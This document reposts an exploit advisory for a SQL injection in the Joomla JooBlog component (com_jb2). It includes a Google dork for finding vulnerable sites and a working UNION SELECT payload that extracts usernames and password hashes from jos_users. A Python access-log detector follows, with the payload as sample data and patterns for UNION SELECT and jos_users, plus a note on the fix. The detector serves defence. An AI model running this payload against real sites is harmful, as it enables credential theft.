
Joomla Component JooBlog 0.1.1 (PostID) SQL Injection Vuln.



This is not created by me, however, many sites are being exploited due to
it, so I thought I'd spread the word:

http://www.milw0rm.com/exploits/7078 
#######################################################
 Joomla Component com_jb2(PostID) SQL-injection Vulnerability

#######################################################

###################################################
#[~] Author :  boom3rang
#[~] Kosova Hackers Group [www.khg-crew.ws] 
#[~] Greetz : H!tm@N, KHG, chs, redc00de, LiTTle-Hack3r, L1RIDON1.

#[!] Module_Name:  com_jb2
#[!] Script_Name:  Joomla
#[!] Google_Dork:  inurl:"option=com_jb2 "PostID"
##################################################

--------------------------------------------------------------------------------------------------------------------------------------------------
#[~] Example:
http://localhost/Path/index.php?option=com_jb2&PostID=[exploit] 
--------------------------------------------------------------------------------------------------------------------------------------------------
#[~] Exploit:
-9999'/**/UNION/**/SELECT/**/1,unhex(hex(concat(username,0x3a,password))),3,4,5,6,7+from+jos_users/*
--------------------------------------------------------------------------------------------------------------------------------------------------

##############################
#[!] Proud 2 be Albanian
#[!] Proud 2 be Muslim
#[!] United States of Albania
##############################
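
A detection check for the request pattern in the advisory above, added here as an example and not part of the original post: it scans web-server access logs for com_jb2 requests whose PostID is not a plain integer, after undoing URL encoding and the /**/ comment-as-whitespace trick. The log lines are constructed, and the rule that a legitimate PostID is a non-negative integer is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (sample data, not from the original post).
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Nov/2008:10:01:02 +0000] "GET /index.php?option=com_jb2&PostID=12 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [10/Nov/2008:10:01:09 +0000] "GET /index.php?option=com_jb2&PostID=-9999%27/**/UNION'
    '/**/SELECT/**/1,unhex(hex(concat(username,0x3a,password))),3,4,5,6,7+from+jos_users/* HTTP/1.1" 200 812',
    '198.51.100.9 - - [10/Nov/2008:10:02:00 +0000] "GET /index.php?option=com_content&id=4 HTTP/1.1" 200 900',
    '198.51.100.4 - - [10/Nov/2008:10:03:30 +0000] "GET /index.php?PostID=7%20UnIoN%0aSeLeCt%201&option=com_jb2 HTTP/1.1" 200 300',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
INLINE_COMMENT_RE = re.compile(r'/\*.*?\*/', re.S)


def normalize(value):
    """Replace /*...*/ comments with spaces, collapse whitespace, lowercase."""
    value = INLINE_COMMENT_RE.sub(' ', value)
    return re.sub(r'\s+', ' ', value).strip().lower()


def inspect_line(line):
    """Return the findings for one log line (empty list = nothing flagged)."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    # parse_qs percent-decodes values and turns '+' into a space.
    query = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
    if 'com_jb2' not in query.get('option', []):
        return []
    findings = []
    for raw in query.get('PostID', []):
        value = normalize(raw)
        if not re.fullmatch(r'\d+', value):  # assumption: valid IDs are digits only
            findings.append('PostID is not a plain integer')
        if re.search(r'\bunion\b.*\bselect\b', value):
            findings.append('UNION SELECT in PostID')
        if 'jos_users' in value:
            findings.append('PostID references jos_users')
    return findings


def scan(lines):
    """Return (line_index, findings) for every flagged line."""
    return [(i, f) for i, line in enumerate(lines) if (f := inspect_line(line))]


if __name__ == '__main__':
    for index, findings in scan(SAMPLE_LOG):
        print(index, findings)
```

Log matching only surfaces attempts; the durable fix is for the component to cast PostID to an integer or bind it as a query parameter.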
